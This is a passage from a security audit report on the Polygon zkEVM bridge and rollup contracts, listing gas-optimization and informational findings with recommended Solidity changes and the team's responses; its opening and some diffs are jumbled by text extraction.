lib/DepositContract.sol: lib/DepositContract.sol: { ,→ lib/DepositContract.sol: { ,→ lib/TokenWrapped.sol: verifiers/Verifier.sol: verifiers/Verifier.sol: verifiers/Verifier.sol: for (uint256 i = 0; i < batchesNum; i++) { currentLastForceBatchSequenced++; currentBatchSequenced++; lastPendingState++; lastForceBatch++; for (uint256 i = 0; i < batchesNum; i++) { currentLastForceBatchSequenced++; currentBatchSequenced++; height++ for (uint256 height = 0;height < _DEPOSIT_CONTRACT_TREE_DEPTH;height++) for (uint256 height = 0;height < _DEPOSIT_CONTRACT_TREE_DEPTH;height++) nonces[owner]++, for (uint i = 0; i < elements; i++) { for (uint i = 0; i < input.length; i++) { for (uint i = 0; i < input.length; i++) { Recommendation: Consider pre-fixing all variables where ++ is used. Combine statement where possible and it doesn’t reduce readability. function _deposit(bytes32 leafHash) internal { ... uint256 size = ++depositCount; ... } Polygon-Hermez: Solved partially in PR 82. Some exceptions where it would make the code less readable or it wouldn’t save gas. Spearbit: Verified. 20 +5.3.7 Move initialization values from initialize() to immutable via constructor Severity: Gas Optimization Context: PolygonZkEVM.sol#L337-L370, PolygonZkEVMBridge.sol#L69-L77 Description: The contracts PolygonZkEVM and PolygonZkEVMBridge initialize variables via initialize(). If these variables are never updated they could also be made immutable, which would save some gas. In order to achieve that, a constructor has to be added to set the immutable variables. This could be applicable for chainID in contract PolygonZkEVM and networkID in contract PolygonZkEVMBridge contract PolygonZkEVM is ... { ... uint64 public chainID; ... function initialize(...) ... { ... chainID = initializePackedParameters.chainID; ... } contract PolygonZkEVMBridge is ... { ... uint32 public networkID; ... function initialize(uint32 _networkID,...) ... { networkID = _networkID; ... } Recommendation: Consider making variables immutable and add a constructor to initialize these variables. Polygon-Hermez: Implemented for PolygonZkEVM in PR 88. Not implemented for PolygonZkEVMBridge because it will be deployed with the same address on different chains via CREATE2. In that case it is easier if the initBytecode is the same and thus its easier to stay with initial- ize(). Spearbit: Verified and acknowledged. +5.3.8 Optimize isForceBatchAllowed() Severity: Gas Optimization Context: PolygonZkEVM.sol#L393-L399 Description: The modifier isForceBatchAllowed() includes a redundant check == true. This can be optimized to save some gas. modifier isForceBatchAllowed() { require(forceBatchAllowed == true, ... ); _; } Recommendation: Consider changing the code to modifier isForceBatchAllowed() { - + require(forceBatchAllowed == true, ... ); require(forceBatchAllowed, ... ); _; } 21 Polygon-Hermez: We decide to erase this modifier, this was intended to be present only in testnet, when the forced Batches were not supported yet by the node and prover, this won’t be necessary anymore. It’s a requirement that even the admin won’t be able to censor the system. Spearbit: Verified. +5.3.9 Optimize loop in _updateBatchFee() Severity: Gas Optimization Context: PolygonZkEVM.sol#L839-L908 Description: The function _updateBatchFee() uses the following check in a loop: - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget. block.timestamp - veryBatchTimeTarget > currentSequencedBatchData.sequencedTimestamp block.timestamp The is the same as: As block.timestamp - veryBatchTimeTarget is constant during the execution of this function, it can be taken outside the loop to save some gas. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... while (currentBatch != currentLastVerifiedBatch) { ... if ( block.timestamp - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget ) { ... } } } Recommendation: Consider optimizing the loop by storing the value of block.timestamp - veryBatchTimeTar- get in a temporary variable and use that in the comparison. Polygon-Hermez: Solved in PR 90. Spearbit: Verified. +5.3.10 Optimize multiplication Severity: Gas Optimization Context: PolygonZkEVM.sol#L888 Description: The multiplication in function _updateBatchFee can be optimized to save some gas. Recommendation: Consider changing the code to: +unchecked { - + +} (10 ** (diffBatches * 3)) (1000 ** diffBatches) Note: the gas saving is only received when using unchecked and is very minimal, so double-check it is worth the trouble. Polygon-Hermez: Solved in PR 90. Spearbit: Verified. 22 +5.3.11 Changing constant storage variables from public to private will save gas Severity: Gas Optimization Context: PolygonZkEVM.sol#L114-L127, PolygonZkEVMBridge.sol#L38-L44, TokenWrapped.sol#L9-L20 Description: Usually constant variables are not expected to be read on-chain and their value can easily be seen by looking at the source code. For this reason, there is no point in using public for a constant variable since it auto-generates a getter function which increases deployment cost and sometimes function call cost. Recommendation: Replace all public constant occurrences referenced with private constant to save gas. Polygon-Hermez: The public constants of the TokenWrapped can be useful on both Front ends implementations or another contract, as can be seen in the implementation of permit2 of uniswap. The rest of the constants are changed in PR 85. Spearbit: Verified. +5.3.12 Storage variables not changeable after deployment can be immutable Severity: Gas Optimization Context: Mentioned in Recommendation Description: If a storage variable is not changeable after deployment (set in the constructor) it can be turned into an immutable variable to save gas. Recommendation: • PolygonZkEVMGlobalExitRoot.sol#L6-L48 - import "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol"; - address public bridgeAddress; - address public rollupAddress; + address public immutable bridgeAddress; + address public immutable rollupAddress; - function initialize(address _rollupAddress,address _bridgeAddress) public initializer { + constructor(address _rollupAddress,address _bridgeAddress) { rollupAddress = _rollupAddress; bridgeAddress = _bridgeAddress; } • PolygonZkEVMGlobalExitRootL2.sol#L27 - address public bridgeAddress; + address public immutable bridgeAddress; • PolygonZkEVMTimelock.sol#L14 - PolygonZkEVM public polygonZkEVM; + PolygonZkEVM public immutable polygonZkEVM; • TokenWrapped.sol#L29-L32 - address public bridgeAddress; + address public immutable bridgeAddress; ... - uint8 private _decimals; + uint8 private immutable _decimals; Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 23 +5.3.13 Optimize check in _consolidatePendingState() Severity: Gas Optimization Context: PolygonZkEVM.sol#L799-L832 Description: The check in function _consolidatePendingState() can be optimized to save some gas. As last- PendingStateConsolidated is of type uint64 and thus is at least 0, the check pendingStateNum > lastPend- ingStateConsolidated makes sure pendingStateNum > 0. So the explicit check for pendingStateNum != 0 isn’t necessary. uint64 public lastPendingStateConsolidated; function _consolidatePendingState(uint64 pendingStateNum) internal { require( pendingStateNum != 0 && pendingStateNum > lastPendingStateConsolidated && pendingStateNum <= lastPendingState, "PolygonZkEVM::_consolidatePendingState: pendingStateNum invalid" ); ... } Recommendation: Consider changing the code to function _consolidatePendingState(uint64 pendingStateNum) internal { require( pendingStateNum != 0 && pendingStateNum > lastPendingStateConsolidated && // pendingStateNum can't be 0 pendingStateNum <= lastPendingState, "PolygonZkEVM::_consolidatePendingState: pendingStateNum invalid" - } ); ... Polygon-Hermez: Solved in PR 87. Spearbit: Verified. +5.3.14 Custom errors not used Severity: Gas Optimization Context: PolygonZkEVM.sol#L373 Description: Custom errors lead to cheaper deployment and run-time costs. Recommendation: For a cheaper gas cost, consider using custom errors throughout the whole project. Polygon-Hermez: Solved in PR 90. Spearbit: Verified. 24 +5.3.15 Variable can be updated only once instead of on each iteration of a loop Severity: Gas Optimization Context: PolygonZkEVM.sol#L495, PolygonZkEVM.sol#L1039 Description: In functions sequenceBatches() and sequenceForceBatches(), the currentBatchSequenced vari- able is increased by 1 on each iteration of the loop but is not used inside of it. This means that instead of doing batchesNum addition operations, you can do it only once, after the loop. Recommendation: Delete the currentBatchSequenced++; line and just do currentBatchSequenced += batch- esNum; right after the loop. Polygon-Hermez: Solved in PR 87. Spearbit: Verified. +5.3.16 Optimize emits in sequenceBatches() and sequenceForceBatches() Severity: Gas Optimization Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054 Description: The emits in functions sequenceBatches() and sequenceForceBatches() could be gas optimized by using the tmp variables which have been just been stored in the emited global variables. function sequenceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceBatches(lastBatchSequenced); } function sequenceForceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceForceBatches(lastBatchSequenced); } Recommendation: Consider changing the code to: function sequenceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceBatches(lastBatchSequenced); emit SequenceBatches(currentBatchSequenced); - + } function sequenceForceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceForceBatches(lastBatchSequenced); emit SequenceForceBatches(currentBatchSequenced); - + } Polygon-Hermez: Solved in PR 85. Spearbit: Verified. 25 +5.3.17 Only update lastForceBatchSequenced if nessary in function sequenceBatches() Severity: Gas Optimization Context: PolygonZkEVM.sol#L409-L533 Description: The function sequenceBatches() writes back to lastForceBatchSequenced, however this is only necessary if there are forced batches. This could be optimized to save some gas and at the same time the calculation of nonForcedBatchesSequenced could also be optimized. function sequenceBatches(...) ... { ... uint64 currentLastForceBatchSequenced = lastForceBatchSequenced; ... if (currentBatch.minForcedTimestamp > 0) { currentLastForceBatchSequenced++; ... uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - lastForceBatchSequenced); ... lastForceBatchSequenced = currentLastForceBatchSequenced; ... ,→ } Recommendation: Consider changing the code to something like the following. Do check if the gas savings are worth the trouble. function sequenceBatches(...) ... { ... uint64 currentLastForceBatchSequenced = lastForceBatchSequenced; uint64 orgLastForceBatchSequenced = currentLastForceBatchSequenced; ... if (currentBatch.minForcedTimestamp > 0) { currentLastForceBatchSequenced++; ... uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - lastForceBatchSequenced); uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - orgLastForceBatchSequenced); ... if (currentLastForceBatchSequenced != orgLastForceBatchSequenced) lastForceBatchSequenced = currentLastForceBatchSequenced; ... + - ,→ + ,→ + } Polygon-Hermez: Solved in PR 85. Spearbit: Verified. 26 +5.3.18 Delete forcedBatches[currentLastForceBatchSequenced] after use Severity: Gas Optimization Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054 Description: The functions sequenceBatches() and sequenceForceBatches() use up the forcedBatches[] and then afterward they are no longer used. Deleting these values might give a gas refund and lower the L1 gas costs. function sequenceBatches(...) ... { ... currentLastForceBatchSequenced++; ... require(hashedForcedBatchData == ... forcedBatches[currentLastForceBatchSequenced],...); } function sequenceForceBatches(...) ... { ... currentLastForceBatchSequenced++; ... require(hashedForcedBatchData == forcedBatches[currentLastForceBatchSequenced],...); ... } Recommendation: Consider deleting the values of forcedBatches[currentLastForceBatchSequenced]. Verify if this indeed saves gas. Polygon-Hermez: Solved in PR 85. Spearbit: Verified. +5.3.19 Calculate keccak256(currentBatch.transactions) once Severity: Gas Optimization Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054 Description: cak256(currentBatch.transactions) twice. calculating the keccak256() of it could be relatively expensive. sequenceBatches() functions Both kec- sequenceForceBatches() As the currentBatch.transactions could be rather large, calculate and function sequenceBatches(BatchData[] memory batches) ... { ... if (currentBatch.minForcedTimestamp > 0) { ... bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ... ... } ... currentAccInputHash = ... keccak256(currentBatch.transactions) ... ... } function sequenceForceBatches(ForcedBatchData[] memory batches) ... { ... bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ... ... currentAccInputHash = ... keccak256(currentBatch.transactions) ... ... } Recommendation: Consider storing the result of keccak256(currentBatch.transactions) in a temporary vari- able and reuse it later on. 27 Polygon-Hermez: Solved in PR 85. Spearbit: Verified. 5.4 Informational +5.4.1 Function definition of onMessageReceived() Severity: Informational Context: IBridgeMessageReceiver.sol#L9-L13, PolygonZkEVMBridge.sol#L388-L436 Description: As discovered by the project: the function definition of onMessageReceived() is view and returns a boolean. Also, it is not payable. The function is meant to receive ETH so it should be payable. Also, it is meant to take action so is shouldn’t be view. The bool return value isn’t used in PolygonZkEVMBridge so isn’t necessary. Because the function is called via a low-level call this doesn’t pose a problem in practice. The current definition is confusing though. interface IBridgeMessageReceiver { function onMessageReceived(...) external view returns (bool); } contract PolygonZkEVMBridge is ... { function claimMessage( ... ) ... { ... (bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, "PolygonZkEVMBridge::claimMessage: Message failed"); ... } } Recommendation: Change the function definition to the following: - function onMessageReceived(...) external view returns (bool); + function onMessageReceived(...) external payable; Polygon-Hermez: Solved in PR 89. Spearbit: Verified. +5.4.2 batchesNum can be explicitly casted in sequenceForceBatches() Severity: Informational Context: PolygonZkEVM.sol#L987-L990 Description: The sequenceForceBatches() function performs a check to ensure that the sequencer does not sequence forced batches that do not exist. The require statement compares two different types; uint256 and uint64. For consistency, the uint256 can be safely cast down to uint64 as solidity ˆ0.8.0 checks for over- flow/underflow. Recommendation: Consider explicitly casting down batchesNum to uint64. Polygon-Hermez: Solved by casting to uint256 in PR 85. Spearbit: Verified. 28 +5.4.3 Metadata are not migrated on changes in l1 contract Severity: Informational Context: PolygonZkEVMBridge.sol#L338-L340 Description: wrapped token’s metadata will not change and would point to the older decimal If metadata changes on mainnet (say decimal change) after wrapped token creation then also 1. Token T1 was on mainnet with decimals 18. 2. This was bridged to rollup R1. 3. A wrapped token is created with decimal 18. 4. On mainnet T1 decimal is changed to 6. 5. Wrapped token on R1 still uses 18 decimals. Recommendation: This behavior needs to be documented so that users are careful while interacting with their L2 counterpart if any such scenario occurs Polygon-Hermez: We consider that this is a very unusual behavior to the point that we are not aware of any token that has changed his metadata ( name/symbol/decimals), even if we could consider that as a malicious token since easily can break multiple dapps or trick users changing any of the metadata fields. We will add a comment that we cannot support an update of the metadata if the original token updates its own metadata. Spearbit: Verified. +5.4.4 Remove unused import in PolygonZkEVMGlobalExitRootL2 Severity: Informational Context: PolygonZkEVMGlobalExitRootL2.sol#L5-L11 Description: The contract PolygonZkEVMGlobalExitRootL2 imports SafeERC20.sol, however, this isn’t used in the contract. import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol"; contract PolygonZkEVMGlobalExitRootL2 { } Recommendation: Remove the unused import in PolygonZkEVMGlobalExitRootL2. - import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol"; Polygon-Hermez: Solved in PR 82. Spearbit: Verified. +5.4.5 Switch from public to external for all non-internally called methods Severity: Informational DepositContract.sol#L90, DepositContract.sol#L124, PolygonZkEVMGlobalExitRootL2.sol#L40, PolygonZkEVM- Context: PolygonZkEVMBridge.sol#L69, GlobalExitRoot.sol#L42, PolygonZkEVMBridge.sol#L272, PolygonZkEVMBridge.sol#L129, PolygonZkEVMBridge.sol#L480, PolygonZkEVMBridge.sol#L388, PolygonZkEVM.sol#L337, PolygonZkEVM.sol#L624, PolygonZkEVM.sol#L783, PolygonZkEVM.sol#L920, PolygonZkEVM.sol#L972, PolygonZkEVM.sol#L1064, PolygonZkEVM.sol#L1074, PolygonZkEVM.sol#L1084, PolygonZkEVM.sol#L1097, PolygonZkEVM.sol#L1110, PolygonZkEVM.sol#L1133, PolygonZkEVM.sol#L1155, PolygonZkEVM.sol#L1171, PolygonZkEVM.sol#L1182, PolygonZkEVM.sol#L1204, PolygonZkEVM.sol#L1258 PolygonZkEVMBridge.sol#L222, PolygonZkEVMBridge.sol#L446, PolygonZkEVM.sol#L545, PolygonZkEVM.sol#L409, Verifier.sol#L320, 29 Description: Functions that are not called from inside of the contract should be external instead of public, which prevents accidentally using a function internally that is meant to be used externally. See also issue "Use calldata instead of memory for function parameters". Recommendation: Change the function visibility from public to external for the linked methods. Polygon-Hermez: Solved in PR 85. Note: bridgeAsset() is still public since it’s used in one of the mocks and changing to external has no effect on bytecode length or gas cost. Spearbit: Verified. +5.4.6 Common interface for PolygonZkEVMGlobalExitRoot and PolygonZkEVMGlobalExitRootL2 Severity: Informational Context: PolygonZkEVMGlobalExitRoot.sol#L5, PolygonZkEVMGlobalExitRootL2.sol#L11 Description: The contract PolygonZkEVMGlobalExitRoot inherits from IPolygonZkEVMGlobalExitRoot, while PolygonZkEVMGlobalExitRootL2 doesn’t, although they both implement a similar interface. Note: PolygonZkEVMGlobalExitRoot implements an extra function getLastGlobalExitRoot(). the same interface file would improve the checks by the compiler. Inheriting from import "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol"; contract PolygonZkEVMGlobalExitRoot is IPolygonZkEVMGlobalExitRoot, ... { ... } contract PolygonZkEVMGlobalExitRootL2 { } Recommendation: Consider having a common interface file and an additional interface for the extra function in PolygonZkEVMGlobalExitRoot. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. +5.4.7 Abstract the way to calculate GlobalExitRoot Severity: Informational Context: PolygonZkEVMGlobalExitRoot.sol#L54-L85, PolygonZkEVMBridge.sol#L520-L581 Description: The algorithm to combine the mainnetExitRoot and rollupExitRoot is implemented in several locations in the code. This could be abstracted in contract PolygonZkEVMBridge, especially because this will be enhanced when more L2s are added. 30 contract PolygonZkEVMGlobalExitRoot is ... { function updateExitRoot(bytes32 newRoot) external { ... bytes32 newGlobalExitRoot = keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot) ,→ ); // first ... } function getLastGlobalExitRoot() public view returns (bytes32) { return keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot) ); // second } } contract PolygonZkEVMBridge is ... { function _verifyLeaf(..., bytes32 mainnetExitRoot, bytes32 rollupExitRoot, ...) ... { ... uint256 timestampGlobalExitRoot = globalExitRootManager .globalExitRootMap( keccak256(abi.encodePacked(mainnetExitRoot, rollupExitRoot)) ); // third ,→ ... } } Recommendation: Consider using functions like the functions below: function calculateGlobalExitRoot(bytes32 mainnetExitRoot, bytes32 rollupExitRoot) public view returns (bytes32) { return keccak256(abi.encodePacked(mainnetExitRoot, rollupExitRoot) ); ,→ } The following function is useful to prevent having to call globalExitRootManager twice from PolygonZkEVMBridge. function globalExitRootMapCalculated(bytes32 mainnetExitRoot, bytes32 rollupExitRoot) public view returns (bytes32) { return globalExitRootMap[calculateGlobalExitRoot(mainnetExitRoot, rollupExitRoot)]; ,→ } Polygon-Hermez: We created a library to abstract this calculation: GlobalExitRootLib.sol. We didn’t put it in the PolygonZkEVMGlobalExitRoot, since then it should also be put in PolygonZkEVMGlobalExitRootL2 and that contract should be as simple as possible and shouldn’t have to be updated when adding new networks. Solved in PR 88. Spearbit: Verified. +5.4.8 ETH honeypot on L2 Severity: Informational Context: genesis-gen.json#L9 Description: The initial ETH allocation to the Bridge contract on L2 is rather large: 2E8 ETH on the test network and 1E11 ETH on the production network according to the documentation. This would make the bridge a large honey pot, even more than other bridges. If someone would be able to retrieve the ETH they could exchange it with all available other coins on the L2, bridge them back to mainnet, and thus steal about all TVL on the L2. Recommendation: A possible solution could be • Have a cold wallet contract on L2 that contains the bulk of the ETH. • Have a function that can only transfer ETH to the bridge contract (the bridge contract must be able to receive this). • A government action could trigger the ETH transfer to the bridge; making sure there is a sufficiently large amount for any imaginable bridge action. 31 • Alternatively this action could be permissionless, but that would require implementing time and amount limits, which would complicate the contract. Polygon-Hermez: An alternative to pre-minting could be to have a function to mint ETH, which we decided not to implement because it is too risky. If the bridge would be taken over then there are several other ways to steal the TVL. Any solutions would complicate the logic and introduce more risk, especially if human interaction is involved. Spearbit: Acknowledged. +5.4.9 Allowance is not required to burn wrapped tokens Severity: Informational Context: TokenWrapped.sol#L62-L64 Description: The burn of tokens of the deployed TokenWrapped doesn’t use up any allowance, because the Bridge has the right to burn the wrapped token. Normally a user would approve a certain amount of tokens and then do an action (e.g. bridgeAsset()). This could be seen as an extra safety precaution. So you lose the extra safety this way and it might be unexpected from the user’s point of view. However, it’s also very convenient to do a one-step bridge (comparable to using the permit). Note: most other bridges do it also this way. function burn(address account, uint256 value) external onlyBridge { _burn(account, value); } Recommendation: Document the behavior so users are aware an allowance is not required. Polygon-Hermez: Will be added to the documentation and a comment is added in PR 88. Spearbit: Verified. +5.4.10 Messages are lost when delivered to EOA by claimMessage() Severity: Informational Context: PolygonZkEVMBridge.sol#L388-L436 Description: The function claimMessage() calls the function onMessageReceived() via a low-level call. When the receiving address doesn’t contain a contract the low-level call still succeeds and delivers the ETH. The documen- tation says: "... IBridgeMessageReceiver interface and such interface must be fulfilled by the receiver contract, it will ensure that the receiver contract has implemented the logic to handle the message." As we understood from the project this behavior is intentional. It can be useful to deliver ETH to Externally owned accounts (EOAs), however, the message (which is the main goal of the function) isn’t interpreted and thus lost, without any notification. The loss of the delivery of the message to EOAs (e.g. non contracts) might not be obvious to the casual readers of the code/documentation. function claimMessage(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, "PolygonZkEVMBridge::claimMessage: Message failed"); ... } Recommendation: Doublecheck this behavior is true as intended. Add comments about EOAs in the code and clarify them in the documentation. 32 Polygon-Hermez: Solved in PR 88. Spearbit: Verified. +5.4.11 Replace assembly of _getSelector() with Solidity Severity: Informational Context: PolygonZkEVMBridge.sol#L611-L736 Description: The function _getSelector() gets the first four bytes of a series of bytes and used assembly. This can also be implemented in Solidity, which is easier to read. function _getSelector(bytes memory _data) private pure returns (bytes4 sig) { assembly { sig := mload(add(_data, 32)) } } function _permit(..., bytes calldata permitData) ... { bytes4 sig = _getSelector(permitData); ... } Recommendation: Consider using the following way to retrieve the first four bytes and remove function _getSe- lector() function _permit(..., bytes calldata permitData) ... { - + bytes4 sig = _getSelector(permitData); bytes4 sig = bytes4(permitData[:4]); Polygon-Hermez: Solved in PR 82. Spearbit: Verified. +5.4.12 Improvement suggestions for Verifier.sol Severity: Informational Context: Verifier.sol#L14, IVerifierRollup.sol Description: Verifier.sol is a contract automatically generated by snarkjs and is based on the template ver- ifier_groth16.sol.ejs. There are some details that can be improved on this contract. However, changing it will require doing PRs for the Snarkjs project. Recommendation: We have the following improvement suggestions: • Change to Solidity version 0.8.x because version 0.6.11 is older and misses overflow/underflow checks. Also, rest of the PolygonZkEVM uses version 0.8.x. This will also allow using custom errors. • Use uint256 instead of uint, because then its immediately clear how large the uints are. • Doublecheck sub(gas(), 2000 in the staticcall()s, as it might not be necessary anymore after the Tan- gerine Whistle fork because only 63/64 of the gas is sent. • Generate an explicit interface file like IVerifierRollup.sol and let Verifier.sol inherit this to make sure they are compatible. We also have these suggestions for gas optimizations: • uint q in function negate() could be a constant; • uint256 snark_scalar_field in function verify() could be a constant; • remove switch success case 0 { invalid() } } as it is redundant with the require() after it; • in function pairing() store the i*6 in a tmp variable; • in function verifyProof() use return (verify(inputValues, proof) == 0);. 33 Polygon-Hermez: These are great suggestions, but it requires some time to analyze if these optimizations are completely safe so we will postpone it to add them in future versions. Spearbit: Acknowledged. +5.4.13 Variable named incorrectly Severity: Informational Context: PolygonZkEVM.sol#L854 Description: Seems like the variable veryBatchTimeTarget was meant to be named verifyBatchTimeTarget as evidenced from the comment below: // Check if timestamp is above or below the VERIFY_BATCH_TIME_TARGET Recommendation: Rename the variable veryBatchTimeTarget to verifyBatchTimeTarget. Also, rename the event SetVeryBatchTimeTarget to SetVerifyBatchTimeTarget In case if the variable is named correctly then update the comment below: // Check if timestamp is above or below the veryBatchTimeTarget Polygon-Hermez: Solved in PR 88. Spearbit: Verified. +5.4.14 Add additional comments to function forceBatch() Severity: Informational Context: PolygonZkEVM.sol#L920-L966 Description: The function forceBatch() contains a comment about synch attacks. what is meant by that. The team explained the following: It’s not immediately clear • Getting the call data from an EOA is easy/cheap so no need to put the transactions in the event (which is expensive). • Getting the internal call data from internal transactions (which is done via a smart contract) is complicated (because it requires an archival node) and then it’s worth it to put the transactions in the event, which is easy to query. function forceBatch(...) ... { ... // In order to avoid synch attacks, if the msg.sender is not the origin // Add the transaction bytes in the event if (msg.sender == tx.origin) { emit ForceBatch(lastForceBatch, lastGlobalExitRoot, msg.sender, ""); } else { emit ForceBatch(lastForceBatch,lastGlobalExitRoot,msg.sender,transactions); } } Recommendation: Add additional comments to the function forceBatch() to explain the approach taken. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 34 +5.4.15 Check against MAX_VERIFY_BATCHES Severity: Informational Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L545-L611, PolygonZkEVM.sol#L972-L1054 **Description:**In several functions a comparison is made with < MAX_VERIFY_BATCHES. This should probably be <= MAX_VERIFY_BATCHES, otherwise, the MAX will never be reached. uint64 public constant MAX_VERIFY_BATCHES = 1000; function sequenceForceBatches(ForcedBatchData[] memory batches) ... { uint256 batchesNum = batches.length; ... require(batchesNum < MAX_VERIFY_BATCHES, ... ); ... } function sequenceBatches(BatchData[] memory batches) ... { uint256 batchesNum = batches.length; ... require(batchesNum < MAX_VERIFY_BATCHES, ...); ... } function verifyBatches(...) ... { ... require(finalNewBatch - initNumBatch < MAX_VERIFY_BATCHES, ... ); ... } Recommendation: Double-check the conclusion and consider applying these changes -require( ... < MAX_VERIFY_BATCHES, ... ); +require( ... <= MAX_VERIFY_BATCHES, ... ); Polygon-Hermez: Solved in PR 88. Spearbit: Verified. +5.4.16 Prepare for multiple aggregators/sequencers to improve availability Severity: Informational Context: PolygonZkEVM.sol#L377-L391 Description: As long are there is one (trusted)sequencer and one (trusted)aggregator the availability risks are relatively high. However, the current code isn’t optimized to support multiple trusted sequencers and multiple trusted aggregators. modifier onlyTrustedSequencer() { require(trustedSequencer == msg.sender, ... ); _; } modifier onlyTrustedAggregator() { require(trustedAggregator == msg.sender, ... ); _; } Recommendation: It might be useful to make small changes in the code to support multiple trusted sequencers and multiple trusted aggregators to improve availability. Polygon-Hermez: Since the trustedSequencer/trustedAggregator address can be changed, if we want to sup- port multiple trusted actors or/and add a consensus layer to coordinate them this will be delegated in the future by another smart contract. 35 Spearbit: Acknowledged. +5.4.17 Temporary Fund freeze on using Multiple Rollups Severity: Informational Context: PolygonZkEVMBridge.sol#L157-L165 Description: Claiming of Assets will freeze temporarily if multiple rollups are involved as shown below. The asset will be lost if the transfer is done between: a. Mainnet -> R1 -> R2 b. R1 -> R2 -> Mainnet 1. USDC is bridged from Mainnet to Rollover R1 with its metadata. 2. User claims this and a new Wrapped token is prepared using USDC token and its metadata. bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress)); TokenWrapped newWrappedToken = (new TokenWrapped){salt: tokenInfoHash}(name, symbol, decimals); 3. Let’s say the User bridge this token to Rollup R2. This will burn the wrapped token on R1 if (tokenInfo.originTokenAddress != address(0)) { // The token is a wrapped token from another network // Burn tokens TokenWrapped(token).burn(msg.sender, amount); originTokenAddress = tokenInfo.originTokenAddress; originNetwork = tokenInfo.originNetwork; } 4. The problem here is now while bridging the metadata was not set. 5. So once the user claims this on R2, wrapped token creation will fail since abi.decode on empty metadata will fail to retrieve name, symbol,... The asset will be temporarily lost since it was bridged properly but cannot be claimed Showing the transaction chain Mainnet bridgeAsset(usdc,R1,0xUser1, 100, “) • Transfer 100 USDC to Mainnet M1 • originTokenAddress=USDC • originNetwork = Mainnet • metadata = (USDC,USDC,6) • Deposit node created R1 claimAsset(...,Mainnet,USDC,R1,0xUser1,100, metadata = (USDC,USDC,6)) • Claim verified • Marked claimed • tokenInfoHash derived from originNetwork, originTokenAddress which is Mainnet, USDC • tokenInfoToWrappedToken[Mainnet,USDC] created using metadata = (USDC,USDC,6) • User minted 100 amount of tokenInfoToWrappedToken[Mainnet, USDC] bridgeAsset(tokenInfoToWrappedToken[Mainnet,USDC],R2,0xUser2, 100, “) • Burn 100 tokenInfoToWrappedToken[Mainnet,USDC] • originTokenAddress=USDC • originNetwork = Mainnet 36 • metadata = "" • Deposit node created with empty metadata R2 claimAsset(...,Mainnet,USDC,R2,0xUser2,100, metadata = "") • Claim verified • Marked claimed • tokenInfoHash derived from originNetwork, originTokenAddress which is Mainnet, USDC • Since metadata = "" , abi decode fails Recommendation: Since the current system does not have multiple rollups currently so marking this issue infor- mational. But in the future when multiple rollups are in place, this code needs to be upgraded to retrieve metadata during burn while bridging which will ensure recipient rollup to correctly decode metadata Polygon-Hermez: We will take this into account if we upgrade the system to support multiple rollups. Spearbit: Acknowledged. +5.4.18 Off by one error when comparing with MAX_TRANSACTIONS_BYTE_LENGTH constant Severity: Informational Context: PolygonZkEVM.sol#L933, PolygonZkEVM.sol#L471 Description: When comparing against MAX_TRANSACTIONS_BYTE_LENGTH, the valid range should be <= instead of <. require( transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH, "PolygonZkEVM::forceBatch: Transactions bytes overflow" ); require( currentBatch.transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH, "PolygonZkEVM::sequenceBatches: Transactions bytes overflow" ); Recommendation: Consider using <= instead of <. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. +5.4.19 trustedAggregatorTimeout value may impact batchFees Severity: Informational Context: PolygonZkEVM.sol#L855-L858 , PolygonZkEVM.sol#L557-L562 Description: If trustedAggregatorTimeout and veryBatchTimeTarget are valued nearby then all batches veri- fied by 3rd party will be above target (totalBatchesAboveTarget) and this would impact batch fees. 1. Let’s say veryBatchTimeTarget is 30 min and trustedAggregatorTimeout is 31 min. 2. Now anyone can call verifyBatches only after 31 min due to the below condition. 37 require( ); sequencedBatches[finalNewBatch].sequencedTimestamp + trustedAggregatorTimeout <= block.timestamp, "PolygonZkEVM::verifyBatches: Trusted aggregator timeout not expired" 3. This means _updateBatchFee can at minimum be called after 31 min of sequencing by a nontrusted aggre- gator. 4. The below condition then always returns true. if ( // 31>30 ) { block.timestamp - currentSequencedBatchData.sequencedTimestamp >veryBatchTimeTarget Recommendation: As mentioned by the product team, the trustedAggregatorTimeout value is only meant to be high at initialization and emergency time, during which 3rd party aggregation should not happen, thus preventing the issue For time part from initialization and emergency, trustedAggregatorTimeout is meant to move towards 0 value. Hence it could be documented as a reference to Admin that Admin should always take care to set the value lower than veryBatchTimeTarget during normal scenarios. Polygon-Hermez: Add a comment in PR 88. Spearbit: Verified. +5.4.20 Largest allowed batch fee multiplier is 1023 instead of 1024 Severity: Informational Context: PolygonZkEVM.sol#L1155, PolygonZkEVM.sol#L133 Description: Per the setMultiplierBatchFee function, the largest allowed batch fee 